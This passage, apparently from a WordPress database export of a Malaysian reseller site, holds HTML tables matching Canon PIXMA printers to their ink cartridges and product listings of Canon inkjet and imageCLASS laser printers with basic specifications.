width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-24 16:06:03','2019-09-24 08:06:03','',1449,'https://bintara.com.my/blog/2019/09/24/1449-revision-v1/',0,'revision','',0),(3304,1,'2019-09-24 16:16:50','2019-09-24 08:16:50','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h3>Laser Printers :-</h3>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" 